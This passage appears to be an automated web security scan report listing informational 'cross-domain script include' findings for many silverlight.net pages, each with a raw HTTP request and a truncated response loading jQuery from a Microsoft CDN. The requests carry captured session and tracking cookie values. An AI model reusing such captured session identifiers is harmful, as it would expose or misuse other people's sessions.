Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Blog Archi
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.597. http://www.silverlight.net/community/recognition/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/recognition/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/recognition/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35852
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.598. http://www.silverlight.net/community/recognition/halloffame.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/recognition/halloffame.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/recognition/halloffame.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40688
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Hall Of Fa
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.599. http://www.silverlight.net/community/samples/featured/telerik-facedeck/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/featured/telerik-facedeck/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/featured/telerik-facedeck/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24005
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:39:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.600. http://www.silverlight.net/community/samples/silverlight-samples/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/silverlight-samples/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/silverlight-samples/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50603
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.601. http://www.silverlight.net/community/samples/silverlight-samples/animated-note-control-37395/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/silverlight-samples/animated-note-control-37395/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/silverlight-samples/animated-note-control-37395/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23259
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.602. http://www.silverlight.net/community/samples/silverlight-samples/babysmash7-wp7-app-37425/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/silverlight-samples/babysmash7-wp7-app-37425/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/silverlight-samples/babysmash7-wp7-app-37425/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23273
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.603. http://www.silverlight.net/community/samples/silverlight-samples/childwindow-effects-37469/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/silverlight-samples/childwindow-effects-37469/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/silverlight-samples/childwindow-effects-37469/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23262
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.604. http://www.silverlight.net/community/samples/silverlight-samples/fill-background-with-patterns--texture-37396/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/silverlight-samples/fill-background-with-patterns--texture-37396/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/silverlight-samples/fill-background-with-patterns--texture-37396/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23357
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.605. http://www.silverlight.net/community/samples/silverlight-samples/infragistics-xamgrid-37452/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/silverlight-samples/infragistics-xamgrid-37452/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/silverlight-samples/infragistics-xamgrid-37452/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23316
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.606. http://www.silverlight.net/community/samples/silverlight-samples/rated/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/silverlight-samples/rated/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/silverlight-samples/rated/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49602
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.607. http://www.silverlight.net/community/samples/silverlight-samples/simple-but-cool-silverlight-messageboxes-37444/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/silverlight-samples/simple-but-cool-silverlight-messageboxes-37444/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/silverlight-samples/simple-but-cool-silverlight-messageboxes-37444/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23460
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.608. http://www.silverlight.net/community/samples/upload/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /community/samples/upload/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/samples/upload/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12674
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Upload You
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.609. http://www.silverlight.net/contact.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17764
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Contact Us
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.610. http://www.silverlight.net/getstarted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /getstarted/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getstarted/ HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:11 GMT
Content-Length: 25546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Get Starte
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.611. http://www.silverlight.net/getstarted/devices/details.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /getstarted/devices/details.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getstarted/devices/details.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12831
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Offici
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.612. http://www.silverlight.net/getstarted/devices/symbian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /getstarted/devices/symbian/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getstarted/devices/symbian/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15591
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.613. http://www.silverlight.net/getstarted/devices/windows-phone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /getstarted/devices/windows-phone/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getstarted/devices/windows-phone/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17451
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.614. http://www.silverlight.net/getstarted/overview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /getstarted/overview.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /getstarted/overview.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75954
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Overview :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.615. http://www.silverlight.net/learn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27079
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Learn : Th
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.616. http://www.silverlight.net/learn/books/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/books/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/books/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45079
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Books : Th
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.617. http://www.silverlight.net/learn/dynamic-languages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/dynamic-languages/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /learn/dynamic-languages/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27860
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
